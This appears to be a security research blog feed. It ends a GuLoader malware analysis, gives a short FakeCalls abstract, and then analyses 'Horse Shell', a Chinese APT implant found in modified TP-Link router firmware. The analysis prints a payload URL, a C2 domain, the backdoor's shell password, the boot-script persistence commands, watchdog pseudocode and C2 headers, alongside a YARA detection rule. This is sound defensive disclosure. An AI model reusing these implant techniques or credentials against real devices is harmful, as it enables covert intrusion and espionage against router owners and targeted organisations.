For the example above, we deobfuscated the code, clearing it of junk instructions and jumps. In reality, the code contains a large number of garbage and invalid instructions. To help understand the obfuscation complexity, this is part of the original code corresponding to the previous example:

Figure 18 – Composing encrypted strings in the heavily obfuscated GuLoader shellcode.

Unlike strings, the decryption key is stored as a regular sequence of bytes following the decryption function:

Figure 19 – Strings decryption XOR key.

This key is usually not very long, with a maximum of 64 bytes.

The strings are decrypted using an XOR operation with the decryption key. After decrypting the strings, we can find a string that looks like a URL, but without a schema:

vgtirek34.138.169.8/wp-content/themes/seotheme/CbwPtnKqeAYGeixiNB73.inf

It’s obvious that the GuLoader authors realized the way the research community managed to decrypt URLs in the previous versions of the shellcode using the strings “http://” or “https://” in the known-plaintext attack to detect the first bytes of the decryption key. Therefore, in the new version, they replaced the URL scheme with random bytes.

If the 5^th byte of the decrypted URL-string is equal to “s”, GuLoader replaces the first 8 bytes with “https://”. Otherwise, it replaces the first 7 bytes with “http://”.

Here are examples of more URL-strings extracted from different samples:

Payload decryption

The payload decryption key is also stored in the same way as the encrypted strings but the key is not encrypted. The key length is usually in the range of 800-900 bytes.

For example, in a sample with MD5 40b9ca22013d02303d49d8f922ac2739, the length of the key is 844 bytes. However, another length is used for the decryption routine, and is stored in the obfuscated form:

Figure 20 – Key length used for decrypting the payload differs from the length stored with the key.

GuLoader used a different size, rather than the size stored with the key, to deceive automated analysis. If we don’t take this into account, we can only decrypt the first 843 bytes of the downloaded payload, and the rest of the data will be broken.

The payload decryption algorithm itself has not changed in comparison to the previous GuLoader versions. The first 64 bytes of the downloaded data are skipped. Then, to get the final key, GuLoader assumes that the first 2 bytes of the decrypted payload should be “MZ” and calculates the 2-bytes XOR key (rand_key). The payload decryption key is then XOR-ed with the calculated 2-bytes value:

Figure 21 – Calculating the final key used for decrypting the payload.

The resulting key is finally used to decrypt the payload.

Conclusion

Several years after its introduction, the threat posed by GuLoader continues to grow. This is primarily due to the fact that the GuLoader developers are continually working to improve their product. The advanced defense evasion of GuLoader made it a favored tool among threat actors for delivering malware.

GuLoader counteracts antivirus products using a variety of sandbox evasion techniques, code obfuscation, and multiple layers of encryption. The GuLoader developers continually improve the anti-analysis and anti-debugging techniques. This year we also saw the use of a new trick: moving the encrypted shellcode to the cloud, and using a VBScript to download the shellcode. As a result, victims receive a VBScript file, which is less suspicious than an .exe file and is less likely to trigger alerts.

The use of encryption and storing payloads in a raw binary format without any headers and separate from the loader makes them totally invisible to antiviruses. This allows threat actors to use Google Drive to store malicious payloads and bypass its antivirus protection. In some cases download links to GuLoader malicious payloads stored in Google Drive remain active for very long periods of time.

Appendix: Indicators of Compromise

Check Point Threat Emulation provides protection against this threat:

Dropper.Win.CloudEyE.*

The post Cloud-Based Malware Delivery: The Evolution of GuLoader appeared first on Check Point Research.

Abstract: For all the ridiculous spam calls in the world, but a small percentage of them are actually, legitimately, convincing. According to the Korean government, “voice phishing” compromises nearly 200 Korean citizens every day, with average financial losses around 8,500 dollars worth of Korean won.
If it’s that successful, surely, the scammers are doing something right.
There’s more substance to these attacks than you might think.

The post FakeCalls: the Spam Calls that Really Work appeared first on Check Point Research.

Research by: Itay Cohen, Radoslaw Madej, and the Threat Intelligence Team

Over the past few months, Check Point Research has closely monitored a series of targeted attacks aimed at European foreign affairs entities. These campaigns have been linked to a Chinese state-sponsored APT group we track as Camaro Dragon, which shares similarities with previously reported activities conducted by state-sponsored Chinese threat actors, namely Mustang Panda.

Our comprehensive analysis of these attacks has uncovered a malicious firmware implant tailored for TP-Link routers. The implant features several malicious components, including a custom backdoor named “Horse Shell” that enables the attackers to maintain persistent access, build anonymous infrastructure and enable lateral movement into compromised networks.

The discovery is yet another example of a long-standing trend of Chinese threat actors to exploit Internet-facing network devices and modify their underlying software or firmware. This blog post will delve into the intricate details of analyzing the “Horse Shell” router implant. We will share our insights into the implant’s functionality and compare it to other router implants associated with Chinese state-sponsored groups. By examining this implant, we hope to shed light on the techniques and tactics utilized by the Camaro Dragon APT group and provide a better understanding of how threat actors utilize malicious firmware implants in network devices in their attacks.

Key Findings

• Checkpoint Research has discovered and analyzed a custom firmware image affiliated with the Chinese state-sponsored actor “Camaro Dragon”.
• The firmware image contained several malicious components, including a custom MIPS32 ELF implant dubbed “Horse Shell”. In addition to the implant, a passive backdoor providing attackers with a shell to infected devices was found.
• “Horse Shell”, the main implant inserted into the modified firmware by the attackers, provides the attacker with 3 main functionalities:
  • Remote shell — Execution of arbitrary shell commands on the infected router
  • File transfer — Upload and download files to and from the infected router.
  • SOCKS tunneling — Relay communication between different clients.
• Due to its firmware-agnostic design, the implant’s components can be integrated into various firmware by different vendors
• The deployment method of the firmware images on the infected routers is still unclear, as well as its usage and involvement in actual intrusions.

Background

Since January 2023, Check Point Research is tracking sophisticated attacks targeting officials in multiple European countries. The campaign leveraged a wide variety of tools, among them implants commonly associated with Chinese state-sponsored threat actors. This activity has significant infrastructure overlaps with activities publicly disclosed by our fellow researchers in Avast and ESET, linking it to “Mustang Panda”. This cluster of activity is currently tracked by CPR as “Camaro Dragon”.

Through our detailed analysis of files and infrastructure associated with this campaign, we have discovered a trove of files and payloads used by the group. Among these files, there were two that caught our attention. These were two modified TP-Link router firmware images. As we dug further, it became evident those were tempered with, adding several malicious components to the original firmware, including a custom implant dubbed “Horse Shell”.

The implanted components were discovered in modified TP-Link firmware images. However, they were written in a firmware-agnostic manner and are not specific to any particular product or vendor. As a result, they could be included in different firmware by various vendors. While we have no concrete evidence of this, previous incidents have demonstrated that similar implants and backdoors have been deployed on diverse routers and devices from a range of vendors.

Uncovering the Implants

When faced with a large number of files, it is necessary to quickly triage and filter them to identify those that are more relevant for further inspection. To do this, there are several strategies that can be employed, one of which involves understanding the type of files that are being dealt with.

It is important to note that certain file types are more likely to contain relevant information than others. For instance, graphic images and icons may not be as significant as executable and firmware files. Therefore, to filter through the large number of files in question, we decided to employ the Linux file command, which helped us determine the file types.

Upon running the command, we discovered that two of the files were TP-Link firmware images of a rather dated model, WR940, that was initially released around 2014.

9404.bin: firmware 940 v4 TP-LINK Technologies ver. 1.0, version 3.16.9, [...]
9406.bin: firmware 940 v6 TP-LINK Technologies ver. 1.0, version 3.20.1, [...]

The output of our query showcased that both files pertained to the same model of TP-Link router, albeit intended for different hardware versions, specifically v4 and v6, respectively. The presence of these router firmware files, situated alongside dubious files and tools at the hands of an advanced threat actor, undoubtedly raised suspicion and warranted a thorough investigation.

As the firmware claimed to be for the TP-Link router model WR940N, we aimed to compare the original firmware of both v4 and v6 with the ones we had obtained, analyzing any potential differences. To do so, we procured the original firmware for this model from the TP-Link website, meticulously scrutinizing each component to identify any discrepancies.

Upon inspection, we discovered that the kernel and the uBoot of both firmware versions were identical, indicating that they had not been tampered with by the attackers. However, the filesystems were notably distinct, prompting us to extract and compare them. The firmware are using a custom implementation of SquashFS. To extract the filesystem we used sasquatch. We carried out a meticulous file-by-file comparison. Our aim was to identify which files had been modified, added, or removed, if any.

By conducting a meticulous analysis of each file, we aimed to discern which files had been modified, added, or removed from the suspicious firmware we had encountered. In doing so, we hoped to uncover any potential alterations made by the threat actor.

And indeed, we found that multiple files were added to the firmware we obtained, and a couple of files were modified:

Files added:

• /usr/bin/sheel
• /usr/bin/shell
• /usr/bin/timer
• /usr/bin/udhcp

Files Modified:

• /etc/rc.d/rcS
• /web/userRpm/SoftwareUpgradeRpm.htm

Initial Infection

We are unsure how the attackers managed to infect the router devices with their malicious implant. It is likely that they gained access to these devices by either scanning them for known vulnerabilities or targeting devices that used default or weak and easily guessable passwords for authentication. The goal of the attackers appears to be the creation of a chain of nodes between main infections and real command and control, and if so, they would likely be installing the implant on arbitrary devices with no particular interest.

It is worth noting that this kind of attack is not aimed specifically at sensitive networks, but rather at regular residential and home networks. Therefore, infecting a home router does not necessarily mean that the homeowner was a specific target, but rather that their device was merely a means to an end for the attackers.

Inspecting the Modified Files

SoftwareUpgradeRpm.htm

The TP-Link router, like many routers, has a web interface that allows its users to configure the router and manage it. One of the features of the management website provides the user with the option to manually upgrade their device’s firmware version. The web form for uploading a new firmware exists in SoftwareUpgradeRpm.htm.

This page, on the original and legitimate firmware we obtained from the official TP-Link website, is shown in the image below.

However, in the modified version of the firmware we obtained, a small CSS property was inline added to the HTML form. This property, display:none, will hide the form from a user entering the page.

<FORM action="../incoming/Firmware.htm" enctype="multipart/form-data" method="post" onSubmit="return doSubmit();" style="display: none;">

Hiding the form, will not remove it or the feature from the HTML itself, so users can technically still manually upgrade their firmware version. Although now, it will be harder to perform the upgrade or even know that this feature exists.

/etc/rc.d/rcS

The attackers modified the /etc/rc.d/rcS which is part of the operating systems’ boot scripts. To this initialization script, the attackers added the following three shell commands to execute three of the files added to the modified firmware.

/usr/bin/udhcp &
/usr/bin/shell &
/usr/bin/timer 60 &

The rcS script is usually one of the first scripts to be executed during the system boot process, as it performs tasks that are essential to bringing up the rest of the system. Upon system boot-up, the rcS script would automatically launch all three binaries, thereby ensuring the persistence of the infection on the compromised device.

Analyzing the Added Files

By now, we saw that the attackers modified two files and added 4 files to the altered router firmware, 3 of them are executed by the modified initialization script. To understand what they do, we need to analyze each of the files. Since the router is a MIPS device, the binaries we’ll analyze are all compiled for MIPS32BE architecture. Let’s start.

shell — Passive Backdoor

The shell binary is a simple password-protected bind shell that will bind to all IPv4 network interfaces on port 14444. The password can be revealed with the highly advanced, exceedingly unique tool called strings.

Should you require the password, simply run the following command:

$ strings shell 
[..]                                                                                                                                                                                                                                                                                  
password:                                                                                                                                                                                                                                                                                
J2)3#4G@Iie                                                                                                                                                                                                                                                                               
success!                                                                                                                                                                                                                                                                                  
/bin/sh                                                                                                                                                                                                                                                                                   
[..]

As you can see, the password is hidden away in plain sight, waiting to be extracted by the adept researcher. With this information in hand, access to the elusive shell is granted, allowing for unrestricted entry into the system. May the force be with strings!

sheel

The sheel binary is a utility for configuration writing and reading. It was meant to be executed manually as it wasn’t written to the modified init script. It reads and writes to the /dev/mtdblock4 device. Why would it do so, a curious reader might ask? Before we answer this question, we first need to set the scene. The /dev/mtdblock4 partition on this particular model of the router is in fact a so-called ART partition, which stands for Atheros Radio Test. It is supposed to contain calibration data for the WiFi chipset.

Curiously, the sheel binary uses this partition to store data in a raw format. And not just any data – its purpose is to write and read the C2 domains used by the main implant (udhcp) which is described further below. The obvious reason for writing data in a raw format on a block device is to make it less obvious to be spotted by a router administrator.

The sheel binary allows to write addresses of up to five C2 servers inside the partition. In case the operator didn’t know how to use it, authors included helpful hint, even marking the optional arguments in brackets:

./sheel -h server_ip -p server_port -i update_index[0-4] [-r]

timer

The timer executable is a basic watchdog that is initiated during the boot process. It operates by attempting to execute the added udhcp executable at regular intervals, where the length of these intervals is determined by a number passed to it as a command line argument. The udhcp executable is the main implant in the modified firmware, as we will discuss shortly. When udhcp is launched, it verifies the presence of a file named /var/udhcp. If the file exists and is locked, udhcp terminates as it understands that another instance of itself is already running. However, if it does not exist, udhcp creates the file and writes its own process ID to it. The timer binary, by executing udhcp again and again, provides an additional layer of persistence, ensuring that the primary implant remains active.

The implementation is very simple, and as a reconstructed pseudo-code, it will look like this:

int32_t main(int32_t argc, char** argv, char** envp) 
{
    daemon(1, 0);
    int32_t seconds;
    if (argc >= 2)
    {
        seconds = atoi(argv[1]);
    }
    else
    {
        seconds = 3600;
    }
    while (true)
    {
        sleep(seconds);
        system("/usr/bin/udhcp");
    }
}

Analyzing Horse Shell (udhcp)

The udhcp file is the main implant inserted into the modified firmware by the attackers. Parts of it are internally named Horse Shell so we use it to name the implant as a whole. The implant provides the attacker with 3 main functionalities: remote shell, file transfer, and tunneling.

In the following parts, we will dive deeper into the implementation of the different components, we’ll explain the functionality of Horse Shell and how it is implemented.

Static Analysis

udhcp is a binary compiled for MIPS32 MSB operating system and written in C++. Many embedded devices and routers are running MIPS-based operating systems, and TP-Link routers are no different.

$ file ./udhcp
udhcp: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped

Even though the implant is not easy to analyze, the static information embedded in it makes the analysis a little bit simpler. In spite of it being shown as “stripped”, it is full of meaningful strings such as source file names, debug log messages, function names, names of global variables, and assert messages. Executing strings against the binary will reveal meaningful information that can give a researcher a good idea of what they’re dealing with.

Initializing

Horse Shell execution begins by instructing the system not to terminate it when receiving the SIGPIPE, SIGINT or SIGABRT signals. Then it calls a function named horse_main which is the main function of the implant. In this context, “horse” may refer to Trojan Horse.

Upon invocation, the implant issues a daemon(1, 0) call, which instructs the operating system to detach it from the controlling terminal and run it in the background as a daemon. It then verifies the existence of the file /var/udhcp. If the file exists, Horse Shell assumes that another instance of the implant is already running and immediately terminates. Conversely, if the file is non-existent, the implant creates it, setting its permissions to rw-r--r--. The newly created file then serves as a type of mutex that the Horse Shell writes the current PID to, helping to avoid concurrency issues.

The implant creates a file /var/udhcp.cnf and writes the command kill -9 [PID] to it, [PID] being udhcp’s process ID. It’s unclear how the file is used or what purpose it serves. One suggestion is that it can be used by the attackers to easily terminate the running implant.

Configuration

Most of Horse Shell’s configuration is hard coded. However, some of the entries are dynamically configurable. The instance obtained by us is using m.cremessage[.]com on port 80 as its default command and control server. It will write this domain to /dev/mtdblock4. For non-default peers, it reads a list of peer hosts from /dev/mtdblock4. On an actively infected device, this MTD block can contain values inserted into it by using the aforementioned sheel utility, or by old versions of the implant that were flashed to the device. It will resolve every host to its IP address and check if it’s up and running. If it does, it will continue the initialization of the configuration.

Horse Shell operates as a single-threaded application and adopts an event-driven methodology to direct its execution. It makes extensive use of the open-source library, libev, for I/O events and invokes callback functions in response to specific events. In essence, the program’s progression is dictated by the events that occur, hence analyzing the implant warrants consideration of the events and their associated callbacks. During the configuration initialization phase, it sets up various events and associates callbacks to respond to circumstances such as reading and writing to sockets or establishing a connection.

In its configuration, the implant stores information such as IPs and Port of the command and controls, swap initializes libev structures for network and timer events, cryptographic context, callbacks, pointers to important structures like a linked list that holds active connections, etc.

Initial Connection

Upon finishing configuring itself, Horse Shell will start a ev_timer structure that will trigger a callback function periodically. When triggered, the function will check when it was last executed, and send a heartbeat message to all the established connections.

Then, the implant will try to connect to the command and control. When the initial connection is successfully established, Horse Shell will send to the peer a list of information about the infected device. This information is being sent frequently and not only once. The information sent by the implant contains:

• User name
• System name
• OS version
• OS time
• CPU architecture
• Number of CPUs
• Total RAM
• IP address
• MAC address
• Features supported by the implant (remote shell, tunneling, file transfer)
• Number of active connections

Some of the information sent, such as support functionalities and CPU architecture, can suggest that the implant has other versions that support different devices (i.e. non MIPS devices) and a different set of functionalities.

Communication

Horse Shell communicates with its peers and server on a port specified for each of them individually. By default, it is using port 80 for communication. Regardless of the port, it uses HTTP communication with hard-coded HTTP headers. Every communication by the implant is encrypted using a custom or modified encryption scheme that is based on Substitution-Permutation Network. Every message is encrypted upon sending and decrypted when arrives at the implant.

A request sent from the implant will have this structure:

POST http:/[domain]/index.php HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, application/vnd.ms-powerpoint, application/vnd.ms-excel, */*
Accept-Language: en-US, zh-CN;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; qdesk 2.4.1265.203; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Accept-Encoding: gzip, deflate
Host: [domain]
Connection: Keep-Alive

[encrypted message]

The hard-coded headers hasn’t much to do with the actual data sent. In fact, searching this header online led us to see the exact same HTTP headers on several coding forums and repositories on Chinese websites like CSDN. The Accept-Language header field in all messages transmitted from the implant includes the language code zh-CN, except for one instance. This occurs when the implant sends its initial transmission message containing details about the compromised device, where the Chinese language code is absent from the request. Instead, the attackers have included the HTTP headers with Accept-Language: en-US. It is possible that the attackers intentionally omitted the language code from the request to conceal any indication of their identity that might be inferred from the language used.

Horse Shell is designed to communicate with numerous peers simultaneously. As it lacks multi-threading capabilities, the program employs list containers to segregate the various connected peers as individual list items. Each peer has a distinct structure, with assigned events and callbacks specific to it. This approach guarantees that the communication with each peer remains distinct, utilizing its unique callbacks and event handlers, and does not become intertwined with other peers.

The message structure differs between different types of communication conducted by the implant. Although the overall structure is similar, each functionality within the implant has its distinct nuances and particulars. For instance, the structure of communication related to tunneling will differ from that of a remote shell. However, the HTTP header in the requests remains consistent across all communication types.

Commands and Functionalities

Each functionality has its own list of supported commands. When a new connection is received, it will be parsed and handled by the callback function that handles read events triggered from the peer’s socket. It will check if the packet is requesting to open a new type of connection from the following options:

Remote Shell

When a peer requests to initiate a new remote shell instance, the program will verify the existence of /bin/bash or /bin/sh on the device. If either of them exists, the program will generate a new session using the tsession structure implementation from the Telnet open-source project. This Telnet-based connection provides the attacker with complete shell access to the compromised device.

It’s important to note that the remote shell feature utilizes an embedded Telnet library while it still functions through the implant’s HTTP-based communication. However, the communication between the compromised device and the peer seems unencrypted.

Supported commands

File Transfer

The file transfer module supports downloading and uploading files to and from the infected device, as well as basic file manipulation functionality.

This functionality is important as the attackers may need to upload new modules or tools onto a compromised system to perform specific tasks, such as conducting reconnaissance, stealing data, or moving laterally within a target network. These modules or tools may be customized for the specific target or scenario, and may not be present on the compromised system initially.

In addition, although not very useful for devices such as routers, the threat actors can use this module for data exfiltration or collect different logs from the device.

Supported Commands

Tunneling

The implant can relay communication between two nodes. By doing so, the attackers can create a chain of nodes that will relay traffic to the command and control server. By doing so, the attackers can hide the final command and control, as every node in the chain has information only on the previous and next nodes, each node being an infected device. Only a handful of nodes will know the identity of the final command and control.

By using multiple layers of nodes to tunnel communication, threat actors can obscure the origin and destination of the traffic, making it difficult for defenders to trace the traffic back to the C2. This makes it harder for defenders to detect and respond to the attack.

In addition, a chain of infected nodes makes it harder for defenders to disrupt the communication between the attacker and the C2. If one node in the chain is compromised or taken down, the attacker can still maintain communication with the C2 by routing traffic through a different node in the chain.

Supported commands

Characteristics

Router implants are not something very popular. Sure, there are infamous malware like Mirai and its numerous offshoots, and a handful of Linux-based botnets still lingering out there, but let’s be honest – it’s not exactly the most happening party in town.

However, in recent years we see Chinese threat actors’ increasing interest in compromising edge devices, aiming to both build resilient and more anonymous C&C infrastructures and to gain a foothold in certain targeted networks. In the following section, we list some interesting and unique development decisions taken by the Horse Shell developers and will compare them to another well-known implant used by Chinese espionage group APT31.

Usage of Open Source Projects

The implant smartly integrated multiple open-source libraries in its code. Its remote shell is based on Telnet, events are handled by libev, it has libbase32 in it, ikcp too, and its list containers are based on TOR’s smartlist, implementation. It might get inspiration from other projects such as Shadowsocks-libev and udptun for some of its functionality. Even its exact HTTP headers were taken from open-source repositories.

Structures and Event-driven flow

Horse Shell’s functionality isn’t groundbreaking, but certainly not run-of-the-mill either. However, its reliance on libev to create a complex event-driven program, and its penchant for complex structures and list containers, make our job of analyzing it all the more challenging. But, let’s not mince words – the code quality is impressive, and the implant’s ability to handle multiple tasks across a range of modules and structures demonstrates the kind of advanced skills that make us stand up and take notice.

Unused Code

The vast majority of the functions in the implant are being used. However, a thorough examination has revealed that there are certain functions and submodules that have been neglected and unused, like a lone sock lost in the laundry. We saw unused functions from the JSON and IKCP open-source libraries, custom functions built for UDP handling, and more.

While it’s possible that these forsaken functionalities are simply leftovers from earlier versions or perhaps orphans that belong to other variants for different devices, their purpose remains a mystery to us.

Custom Crypto

Oh, the thrill of creating your very own cryptographic scheme! But alas, it’s not typically the wisest endeavor. However, the daring individuals behind Horse Shell have forged ahead with a custom or tweaked encryption scheme, built upon Substitution-Permutation Network. This scheme is utilized by the implant to encrypt and decrypt the data it transmits and receives.

Despite this being far from a best practice, we must begrudgingly admit that our investigations have thus far failed to reveal any conspicuous flaws in the implementation.

Comparison to Other Implants

The Horse Shell implant is written in C++ and compiled for MIPS32-based operating systems. There aren’t many implants written for network devices and so we went to look for other examples, to see if the implant we’re looking at is a variant of an already known implant. Spoiling the surprise, we were unable to find another implant that we could confidently classify as a version of Horse Shell. Nonetheless, we did come across other implants that share some similarities and were also associated with Chinese state-sponsored actors. It remains unclear whether they are different variations of the same implant or not.

On July 2021, CERT-FR reported a large campaign conducted by the Chinese-affiliated threat actor APT31. They discovered that the actor used a mesh network of compromised routers orchestrated using malware they dubbed “Pakdoor”. A follow-up report that was released in December 2021 shares more information about the campaign as well as a technical analysis of Pakdoor. Security researcher @imp0rtp3 thoroughly analyzed Pakdoor and share their great analysis on their blog.

Like Horse Shell, the Pakdoor implant also infects MIPS router devices, using event-driven execution flow based on libev and makes heavy use of structs and open-source libraries. It seems like the two implants are sharing the same goal of tunneling information between nodes as part of a chain of infected devices. The two also have the capability to act as a Remote Access Tool, providing the attacker with a remote shell on the infected device. The code itself, however, isn’t similar between the two implants, although it has some mutual design and architectural decisions.

We don’t know for sure whether the two implants were written by the same developers and we don’t have evidence to suggest that this is the case. Pakdoor was used by APT31 and Horse Shell was seen in an operation by Camaro Dragon, two seemingly distinct groups.

Attribution

We found the Horse Shell implant while analyzing sophisticated attacks targeting officials in multiple European countries. The campaign leveraged a wide variety of tools, among them tools commonly associated with Chinese state-sponsored threat actors. The activity we analyzed has significant overlaps with activities publicly disclosed by Avast and Eset, linking it to the Chinese-affiliated APT group “Mustang Panda”. We attribute this activity to a Chinese state-sponsored group we call Camaro Dragon. There is enough evidence to suggest that Camaro Dragon has significant overlaps with Mustang Panda, alas we can’t say that this is a full overlap or that these two are the exact same group.

Following are some aspects worth paying attention to regarding the attribution of the tool.

Server and infrastructure

Not only that we found the implant on a server related to the Camaro Dragon activity, we also found out that the IP address (91.245.253[.]72) to which Horse Shell’s C&C resolves to is listed on Avast’s report on their analysis of the Mustang Panda campaign. Given the significant overlaps between Mustang Panda and the group we call Camaro Dragon, it is likely that the router implant was deployed by other campaigns of the group.

Chinese HTTP Request

We described how when Horse Shell transmits data from the infected device, they use a hard-coded HTTP headers. When we searched for this header online we found the exact same HTTP headers appearing on several Chinese websites like CSDN in what seems rather esoteric posts. We did not find the same headers on global forums and platforms such as GitHub or Stack Exchange. This suggests that the authors of the implant may have searched for these headers on Chinese forums or used Chinese search queries to arrive at these examples.

Typos

As we started analyzing Horse Shell, we understood very quickly that the binary is full of debug logs and string artifacts. When doing attribution we try to pay a lot of attention to the language used by the attackers on their implants. While overall the level of English in the implant was quite good, we did notice some typos, some of them repeated again and again across different functions and log strings in the binary. Some of them are:

• “tatal len” — instead of “total”
• “call file_get_http_filed” — instead of “field”
• “s_dbgMsg = “write pid faile.” — instead of “failed”
• “file transfer download open file %s fialed!” — instead of “failed”
• “delete file:%s fialed,open fialed ret=%d” — instead of “failed”
• “unkown file transfer sub cmd” — instead of “unknown”
• “not enough sapce to save lan ipv4 and port” — instead of “space”
• “not enough sapce to malloc a port relay info!”— instead of “space”

Such mistakes can suggest the authors of the implant are not native English speakers as these mistakes should be very visible to developers with a higher level of written English.

Victims

Our investigation of the Camaro Dragon activity was of a campaign targeted mainly at European foreign affairs entities. However, even though we found Horse Shell on the attacking infrastructure, we don’t know who are the victims of the router implant. Learning from history, router implants are often installed on arbitrary devices with no particular interest, with the aim to create a chain of nodes between main infections and real command and control. In other words, infecting a home router does not mean that the homeowner was specifically targeted, but rather that they are only a means to a goal.

Focus on Netwrok Devices

Earlier in this report we discussed similarities between Horse Shell and another router MIPS implant called Pakdoor (or SoWat). Although the two share some commonalities, it is unclear whether one was developed from the other or if these are two distinct malware implants. Nevertheless, Pakdoor — being deployed by the Chinese state-sponsored group APT31 — together with other known instances of zero-day exploits and custom firmware and backdoors for routers and security gateways, demonstrates that such capabilities and types of attacks are of consistent interest and focus of Chinese-affiliated threat actors.

Detection and Protection

The discovery of Camaro Dragon’s malicious implant on TP-Link routers highlights the need for individuals and organizations to take measures to protect themselves from similar attacks. Here are some protection and detection recommendations.

Network Protections

Horse Shell communicates with its peers using HTTP with hard-coded headers. Although the Headers were most likely copied from online forums, they are quite unique and can be used for the detection of communication from potentially infected devices. Traffic using this user agent is likely to be malicious. Use such detection signature with caution, as theoretically, it can block non-malicious traffic.

POST http://[host name]/index.php HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, application/vnd.ms-powerpoint, application/vnd.ms-excel, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; qdesk 2.4.1265.203; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Accept-Encoding: gzip, deflate
Host: [host name]
Connection: Keep-Alive

Software Updates

It’s important to emphasize how important it is to keep your network devices’ firmware version up-to-date. Make sure to regularly update routers and other devices’ firmware and software to prevent vulnerabilities exploited by attackers.

Default Credentials

Always change the default login credentials of any device connected to the internet to stronger passwords and use multi-factor authentication whenever possible. Attackers are scanning the internet for devices that kept the default credentials of their device.

Check Point‘s network security solutions provide advanced threat prevention and real-time network protection against sophisticated attacks like those used by the Camaro Dragon APT group. This includes protection against exploits, malware, and other advanced threats. Check Point’s Quantum IoT Protect automatically identifies and maps IoT devices and assesses the risk, prevents unauthorized access to and from IoT/OT devices with zero-trust profiling and segmentation and blocks attacks against IoT devices. Check Point’s Threat Emulation detects these threats as APT.Wins.HorseShell.A and APT.Wins.HorseShell.B.

Conclusion

Our analysis of the Chinese state-sponsored APT group Camaro Dragon’s attacks on European foreign affairs entities has uncovered a malicious firmware implant tailored for TP-Link routers. The implant features a custom backdoor called “Horse Shell” which enables the attackers to perform actions like remote shell, file transfer, and network tunneling, making it easier for them to anonymize their communication through a chain of infected nodes.

Through our investigation, we have gained a deeper comprehension of the ways in which attackers are employing malware to target edge devices, particularly routers. Our efforts have led us to uncover several of the tactics and tools utilized by Camaro Dragon in their attacks. Our findings not only contribute to a better understanding of the Camaro Dragon group and their toolset but also to the broader cybersecurity community, providing crucial knowledge for understanding and defending against similar threats in the future.

Furthermore, our discovery of the firmware-agnostic nature of the implanted components indicates that a wide range of devices and vendors may be at risk. We hope that our research will contribute to improving the security posture of organizations and individuals alike. In the meantime, remember to keep your network devices updated and secured, and beware of any suspicious activity on your network — you never know who might be lurking in the dragon’s lair!

Appendix A – IOCs

Written Files

Infrastructure

Appendix B: Yara Signatures

rule apt_CN_CamaroDragon_horseshell_strings {
	meta:
		author = "Itay Cohen @ Check Point Research"
		date = "2023-04-01"
		description = "Detects CamaroDragon's HorseShell implant for routers based on embedded strings. This rule is broad."
		hash = "998788472cb1502c03675a15a9f09b12f3877a5aeb687f891458a414b8e0d66c"
		reference = ""
	strings:
		// Crypto
		$crypto_1 = "wzsw_srand"
		$crypto_2 = "wzsw_rand"
		$crypto_3 = "wzsw_init"
		$crypto_4 = "wzsw_crypto_free"
		$crypto_5 = "wzsw_crypto_new"
		$crypto_6 = "wzsw_encrypt_buf"
		$crypto_7 = "wzsw_crypto_reset"


		// File names
		$filename_1 = "common/wzsw_crypto.c"
		$filename_2 = "http/http_socks_tun.cc"
		$filename_3 = "http/http_trans_file.cc"
		$filename_4 = "http/http_horse_shell.cc"
		$filename_5 = "http/http_online.cc"

		// Debug strings
		$debug_1 = "add_file_transfer_info_to_list"
		$debug_2 = "before trans data need connect"
		$debug_3 = "before trans data need connect2"
		$debug_4 = "cancel current task!"
		$debug_5 = "cancel task from task list!"
		$debug_6 = "cancel task task id"
		$debug_7 = "check file file_type is %d, neither file nor dir !"
		$debug_8 = "check_file_transfer_conn_heart_beat"
		$debug_9 = "check_module_heart_beat"
		$debug_10 = "check_socks_tun_conn_heart_beat"
		$debug_11 = "conn_marked_close"
		$debug_12 = "conn_peek socket (sock=%d) closed"
		$debug_13 = "conn_peek socket (sock=%d) recv error,err=%d"
		$debug_14 = "conn_read socket (sock=%d) closed"
		$debug_15 = "conn_read socket (sock=%d) recv error,err=%d"
		$debug_16 = "conn_readfrom socket (sock=%d) recv error,err=%d"
		$debug_17 = "connect lan '%s:%d' in progress!"
		$debug_18 = "create_shell_conn_session"
		$debug_19 = "create_shell_pty_session"
		$debug_20 = "current task %p is not download!"
		$debug_21 = "file transfer download open file %s succeed!"
		$debug_22 = "file transfer oper %d neither download nor upload"
		$debug_23 = "file transfer process connect port cmd->port"
		$debug_24 = "file transfer upload open file %s succeed"
		$debug_25 = "file_transfer_data_request...cur_len=%d"
		$debug_26 = "file_transfer_data_request...SEND_RSP"
		$debug_27 = "file_transfer_data_request"
		$debug_28 = "file_transfer_delete_request"
		$debug_29 = "file_transfer_download_request"
		$debug_30 = "file_transfer_free_cb"
		$debug_31 = "file_transfer_info port %d already started!"
		$debug_32 = "file_transfer_process_connect_port"
		$debug_33 = "file_transfer_query_request"
		$debug_34 = "file_transfer_send_file_data"
		$debug_35 = "file_transfer_upload_request"
		$debug_36 = "find ipv4=%s, port=%d by lan success!"
		$debug_37 = "find_connected_port_relay_info"
		$debug_38 = "find_port_relay_info_by_lan"
		$debug_39 = "find_start_connect_port_relay_info"
		$debug_40 = "free file transfer info!"
		$debug_41 = "get_file_transfer_info_by_conn"
		$debug_42 = "get_file_transfer_info_by_port"
		$debug_43 = "get_free_port_relay_info"
		$debug_44 = "get_port_relay_info_from_list_by_port_relay_conn"
		$debug_45 = "get_socks_tun_info_from_list_by_conn"
		$debug_46 = "get_socks_tun_info_from_list_by_port"
		$debug_47 = "horse_shell_start"
		$debug_48 = "http online data length %d too long"
		$debug_49 = "http_rsp:%s"
		$debug_50 = "info->state=%d not connected!"
		$debug_51 = "invalid NATPORT_COMM_CMD_CONNECT"
		$debug_52 = "invalid NATPORT_COMM_CMD_DISCONNECT"
		$debug_53 = "malloc file transfer info!"
		$debug_54 = "neither cancel upload nor cancel download"
